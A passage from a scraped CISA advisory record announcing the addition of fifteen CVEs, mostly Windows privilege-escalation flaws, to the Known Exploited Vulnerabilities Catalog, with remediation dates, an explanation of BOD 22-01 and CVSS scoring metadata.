\nCVE-2019-1064 | Microsoft Windows AppXSVC Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2019-0841 | Microsoft Windows AppXSVC Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2019-0543 | Microsoft Windows Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2018-8120 | Microsoft Win32k Privilege Escalation Vulnerability | 4/5/2022 \nCVE-2017-0101 | Microsoft Windows Transaction Manager Privilege Escalation Vulnerability | 4/5/2022 \n \nCVE-2016-3309 | Microsoft Windows Kernel Privilege Escalation Vulnerability | 4/5/2022 \n \nCVE-2015-2546 | Microsoft Win32k Memory Corruption Vulnerability | 4/5/2022 \n \nCVE-2019-1132 | Microsoft Win32k Privilege Escalation Vulnerability | 4/5/2022 \n \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf >) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >). **Note:** prioritizing software updates that address known exploited vulnerabilities is one of the actions CISA encourages as part of the recent [Shields Up](<https://www.cisa.gov/shields-up>) recommendations to all stakeholders.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/03/15/cisa-adds-15-known-exploited-vulnerability-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-15T00:00:00", "type": "cisa", "title": "CISA Adds 15 Known Exploited Vulnerability to Catalog ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2546", "CVE-2016-3309", "CVE-2017-0101", "CVE-2018-8120", "CVE-2019-0543", "CVE-2019-0841", "CVE-2019-1064", "CVE-2019-1069", "CVE-2019-1129", "CVE-2019-1132", "CVE-2019-1253", "CVE-2019-1315", "CVE-2019-1322", "CVE-2019-1405", "CVE-2020-5135"], "modified": "2022-03-16T00:00:00", "id": "CISA:60BECD302CACD014F496544254DCB720", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/03/15/cisa-adds-15-known-exploited-vulnerability-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}